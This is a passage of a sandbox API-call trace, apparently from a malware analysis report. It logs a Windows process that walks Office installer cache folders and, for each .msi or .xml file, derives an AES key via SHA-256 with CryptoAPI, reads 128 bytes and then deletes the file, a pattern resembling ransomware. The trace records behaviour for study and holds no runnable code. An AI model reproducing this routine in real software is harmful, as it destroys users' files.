hFindFile=0x284d5a8, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 0 [0122.375] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0122.375] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proofing.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proofing.msi", lpUsedDefaultChar=0x0) returned 13 [0122.375] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0122.375] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0122.375] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.375] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0122.376] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd4200 [0122.376] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0122.466] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0122.466] CryptDestroyKey (hKey=0x284d568) returned 1 [0122.466] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.467] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1 [0122.498] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Proofing.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proofing.xml", lpUsedDefaultChar=0x0) returned 13 [0122.498] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0122.499] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0122.499] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.499] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0122.499] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32b [0122.499] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0122.513] CryptDestroyHash (hHash=0x284d528) returned 1 [0122.513] CryptDestroyKey (hKey=0x284d568) returned 1 [0122.513] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.514] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0122.515] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0122.516] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0122.516] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0122.516] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.516] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0122.516] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16fc [0122.516] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0122.527] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0122.527] CryptDestroyKey (hKey=0x284d568) returned 1 [0122.527] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.528] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0122.529] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0122.529] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0122.529] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0122.611] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0122.611] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.611] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32MUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32MUI.msi", lpUsedDefaultChar=0x0) returned 16 [0122.611] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0122.612] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0122.612] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.612] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0122.612] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd5600 [0122.612] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0122.709] CryptDestroyHash (hHash=0x284d528) returned 1 [0122.709] CryptDestroyKey (hKey=0x284d568) returned 1 [0122.710] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.710] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1 [0122.717] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32MUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32MUI.xml", lpUsedDefaultChar=0x0) returned 16 [0122.717] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0122.718] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0122.718] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.718] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0122.718] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x567 [0122.718] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0122.742] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0122.742] CryptDestroyKey (hKey=0x284d568) returned 1 [0122.742] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.743] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0122.784] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OWOW32LR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OWOW32LR.cab", lpUsedDefaultChar=0x0) returned 13 [0122.784] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0122.784] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0122.785] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0122.785] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.785] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0122.785] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x93a [0122.785] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0122.797] CryptDestroyHash (hHash=0x284d528) returned 1 [0122.797] CryptDestroyKey (hKey=0x284d568) returned 1 [0122.797] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0122.799] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0122.800] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0122.800] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0122.800] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0122.809] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0122.809] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.809] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InfLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InfLR.cab", lpUsedDefaultChar=0x0) returned 10 [0122.810] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InfoPathMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InfoPathMUI.msi", lpUsedDefaultChar=0x0) returned 16 [0122.810] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0122.810] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0122.810] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0122.811] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0122.811] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2fac00 [0122.811] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0123.461] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0123.461] CryptDestroyKey (hKey=0x284d568) returned 1 [0123.461] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0123.462] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 1 [0123.495] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InfoPathMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InfoPathMUI.xml", lpUsedDefaultChar=0x0) returned 16 [0123.495] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0123.496] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0123.496] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0123.496] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0123.496] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4cf [0123.496] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0123.507] CryptDestroyHash (hHash=0x284d528) returned 1 [0123.508] CryptDestroyKey (hKey=0x284d568) returned 1 [0123.508] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0123.509] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0123.510] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0123.510] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0123.510] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0123.510] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0123.510] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0123.511] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x73c [0123.511] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0123.607] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0123.607] CryptDestroyKey (hKey=0x284d568) returned 1 [0123.607] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0123.608] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0123.609] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0123.609] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0123.609] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0123.610] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0123.610] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.610] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0123.612] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0123.612] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0123.612] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0123.612] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0123.612] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1861 [0123.612] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0123.625] CryptDestroyHash (hHash=0x284d528) returned 1 [0123.625] CryptDestroyKey (hKey=0x284d568) returned 1 [0123.625] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0123.625] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0123.626] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VisioLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLR.cab", lpUsedDefaultChar=0x0) returned 12 [0123.626] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VisioMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioMUI.msi", lpUsedDefaultChar=0x0) returned 13 [0123.627] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0123.627] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0123.627] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0123.627] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0123.627] GetFileSize (in: hFile=0x38c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ab000 [0123.627] ReadFile (in: hFile=0x38c, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0123.940] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0123.940] CryptDestroyKey (hKey=0x284d568) returned 1 [0123.940] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0123.942] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 1 [0123.947] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VisioMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioMUI.xml", lpUsedDefaultChar=0x0) returned 13 [0123.947] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0123.947] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0123.947] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0123.948] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0123.948] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x251f [0123.948] ReadFile (in: hFile=0x394, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0123.951] CryptDestroyHash (hHash=0x284d528) returned 1 [0123.951] CryptDestroyKey (hKey=0x284d568) returned 1 [0123.951] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0123.952] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0123.953] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0123.953] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0123.953] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0123.963] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0123.963] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.963] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0123.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OneNoteMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteMUI.msi", lpUsedDefaultChar=0x0) returned 15 [0123.963] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0123.964] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0123.964] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0123.964] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: 